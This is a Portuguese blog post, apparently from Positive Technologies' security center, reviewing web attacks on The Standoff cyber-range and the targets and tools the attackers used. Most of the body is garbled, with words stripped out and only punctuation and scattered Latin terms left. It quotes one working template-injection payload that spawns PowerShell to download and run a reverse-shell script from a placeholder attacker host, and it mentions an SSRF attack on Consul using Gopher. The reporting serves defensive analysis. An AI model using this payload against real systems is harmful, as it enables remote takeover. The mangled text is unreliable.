No último The Standoff, nós, equipa do PT Expert Security Center , em paralelo com os participantes do confronto da parte de defesa, monitorizámos a infraestrutura do local e gabinetes individuais da cópia digital da metrópole implantada no nosso cyber polígono. Para isso, implantamos um centro de operações de segurança (SOC) adicional , que, por assim dizer, cobria toda a infraestrutura, por isso “via” todas as atividades dos participantes do The Standoff e até um pouco mais. Uma das ferramentas deste SOC foi o PT Application Firewall - um firewall de camada de aplicação web (leia sobre os resultados do trabalho de outra de nossas ferramentas SOC - PT Sandbox - em um de nossos artigos anteriores) A seguir iremos nos concentrar exclusivamente no que aconteceu no site do ponto de vista da web e quais alvos as equipes de ataque escolheram.
Estatísticas gerais de ataque
No âmbito do The Standoff, monitorizámos os ataques ao próprio portal do site, bem como a 30 recursos web incluídos na infraestrutura de jogos do campo de treino. Esses foram recursos usados tanto no jogo principal (Meters of the 25 Hours office - um recurso para transmitir leituras de medidores, Consul for Nuft - uma plataforma de gerenciamento de serviços, que será discutida abaixo), e em bug bounty (por exemplo, CMS Umbraco para o Bank of FF, Mantis Bugtracker for 25 Hours é um sistema de rastreamento de bugs para produtos de software, rConfir RCE é um serviço de gerenciamento de configuração de rede para o Big Bro Group). As equipes de leitura receberam pontos por implementar riscos, além de pesquisar vulnerabilidades em sistemas e relatórios.
Quem era quem no polígono cibernético:
- Heavy Ship Logistics — , , , ;
- 25 Hours — , , , ;
- Tube — , , , ;
- Nuft — , ;
- Big Bro Group — ;
- Bank of FF — .
— , . — , bug bounty, «» , . 13. bug bounty . «», (, RCE Flack BookStore SQL Injection — capture the flag). 29 30 - ( , ). , , web application firewall.
The Standoff PT Application Firewall — .
. 1 . , — , — , — . , , . .
( The Standoff 12:00 12 14:00 17 ).
, PT Application Firewall, , , , . . , , , . , .
ube Bank of FF: CMS Made Simple (CMS), bbord ( ), CMS Umbraco, Prestoshop ( ), Avideo encoder ( ), FHEM tomcat ( ), Consul, openEMR ( ), ATutor ( ) rConfig.
. nmap Burp Suite Python Go: Metasploit. burp suite, Metasploit, Responder-.
30 , , , 5 6 2 6 . , — , .
.
« 25 Hours» Meters. , . HubL, {{}} . , , . : {{7*7}} , 7*7.
:
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder(\"cmd.exe\",\"/c\",\"powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.
.
, (, ), ( ) .
— , Nuft Consul. . Server Side Request Forgery, Gopher PUT .
200 .
, ( — ) ( — ).
( false positive) . .
proofs of concept , . , , , .
, CMS Umbraco ( Bank of FF) , - POST; .
, Meters, , — .
request path .
30 . , . . , (ODBC) backup «» .
, ( The Standoff) , , . web application firewall. PT Application Firewall , . , false positive , .
Positive Technologies (PT Expert Security Center)